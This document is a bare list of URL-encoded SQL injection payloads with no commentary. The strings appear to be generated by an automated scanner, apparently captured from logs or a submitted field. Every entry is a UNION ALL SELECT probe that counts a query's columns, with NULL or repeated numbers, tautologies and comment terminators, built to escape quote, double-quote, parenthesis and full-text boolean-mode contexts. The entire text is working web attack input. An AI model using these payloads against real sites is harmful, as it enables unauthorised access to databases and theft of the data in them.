1%27%20%2B%20%28SELECT%20%27tdSh%27%20WHERE%208002%3D8002%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27IaMN%27%20WHERE%205951%3D5951%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nhqh%27%20WHERE%205885%3D5885%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bCIv%27%20WHERE%201058%3D1058%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CwYj%27%20WHERE%202394%3D2394%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Vxju%27%20WHERE%205789%3D5789%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WHUL%27%20WHERE%201226%3D1226%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YzUK%27%20WHERE%201990%3D1990%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZYWP%27%20WHERE%205065%3D5065%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -1114%29%20UNION%20ALL%20SELECT%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%2C%204949%23 -1517%29%20UNION%20ALL%20SELECT%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%2C%207724%23 -8463%29%20UNION%20ALL%20SELECT%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%2C%205646%23 -6594%29%20UNION%20ALL%20SELECT%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%23 -4524%29%20UNION%20ALL%20SELECT%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%2C%206838%23 -3712%29%20UNION%20ALL%20SELECT%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%2C%203795%23 -1083%29%20UNION%20ALL%20SELECT%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%2C%207994%23 -4353%29%20UNION%20ALL%20SELECT%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%23 -7017%29%20UNION%20ALL%20SELECT%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%2C%206872%23 -5518%29%20UNION%20ALL%20SELECT%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%2C%207698%23 -2418%27%29%20UNION%20ALL%20SELECT%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%2C%209736%23 -4255%27%29%20UNION%20ALL%20SELECT%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%2C%201211%23 -4552%27%29%20UNION%20ALL%20SELECT%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%2C%209038%23 -9246%27%29%20UNION%20ALL%20SELECT%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%2C%208487%23 -7591%27%29%20UNION%20ALL%20SELECT%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%2C%204344%23 -9228%27%29%20UNION%20ALL%20SELECT%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%2C%206446%23 -2008%27%29%20UNION%20ALL%20SELECT%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%2C%202593%23 -6259%27%29%20UNION%20ALL%20SELECT%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%2C%209074%23 -1007%27%29%20UNION%20ALL%20SELECT%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%2C%209960%23 -6618%27%29%20UNION%20ALL%20SELECT%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%23 -4848%27%20UNION%20ALL%20SELECT%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%2C%205089%23 -6693%27%20UNION%20ALL%20SELECT%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%23 -2047%27%20UNION%20ALL%20SELECT%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%23 -3436%27%20UNION%20ALL%20SELECT%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%2C%207521%23 -8834%27%20UNION%20ALL%20SELECT%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%2C%207391%23 -2849%27%20UNION%20ALL%20SELECT%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%23 -2578%27%20UNION%20ALL%20SELECT%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%2C%202931%23 -5330%27%20UNION%20ALL%20SELECT%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%2C%207634%23 -2937%27%20UNION%20ALL%20SELECT%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%2C%206426%23 -9883%27%20UNION%20ALL%20SELECT%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%2C%209845%23 -4743%22%20UNION%20ALL%20SELECT%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%2C%202172%23 -2939%22%20UNION%20ALL%20SELECT%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%2C%204969%23 -3425%22%20UNION%20ALL%20SELECT%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%2C%204097%23 -3092%22%20UNION%20ALL%20SELECT%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%2C%202518%23 -3571%22%20UNION%20ALL%20SELECT%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%2C%209117%23 -3309%22%20UNION%20ALL%20SELECT%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%2C%209725%23 -1080%22%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%23 -6750%22%20UNION%20ALL%20SELECT%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%2C%201644%23 -2747%22%20UNION%20ALL%20SELECT%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%23 -9512%22%20UNION%20ALL%20SELECT%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%2C%202597%23 -8689%29%20UNION%20ALL%20SELECT%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%2C%207590%23%20AND%20%289747%3D9747 -3247%29%20UNION%20ALL%20SELECT%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%23%20AND%20%288280%3D8280 -7461%29%20UNION%20ALL%20SELECT%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%2C%209374%23%20AND%20%281401%3D1401 -1024%29%20UNION%20ALL%20SELECT%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%2C%206229%23%20AND%20%281077%3D1077 -9236%29%20UNION%20ALL%20SELECT%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%2C%207721%23%20AND%20%289369%3D9369 -7768%29%20UNION%20ALL%20SELECT%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%2C%205757%23%20AND%20%281661%3D1661 -9515%29%20UNION%20ALL%20SELECT%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%2C%208885%23%20AND%20%289574%3D9574 -8971%29%20UNION%20ALL%20SELECT%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%23%20AND%20%289726%3D9726 -8334%29%20UNION%20ALL%20SELECT%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%2C%203998%23%20AND%20%289130%3D9130 -2024%29%20UNION%20ALL%20SELECT%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%2C%206498%23%20AND%20%282199%3D2199 -1482%29%29%20UNION%20ALL%20SELECT%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%2C%209798%23%20AND%20%28%282826%3D2826 -8018%29%29%20UNION%20ALL%20SELECT%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%2C%205008%23%20AND%20%28%282545%3D2545 -9938%29%29%20UNION%20ALL%20SELECT%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%2C%203300%23%20AND%20%28%282811%3D2811 -2329%29%29%20UNION%20ALL%20SELECT%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%2C%202811%23%20AND%20%28%285358%3D5358 -7944%29%29%20UNION%20ALL%20SELECT%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%2C%201779%23%20AND%20%28%285376%3D5376 -3429%29%29%20UNION%20ALL%20SELECT%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%2C%209952%23%20AND%20%28%285958%3D5958 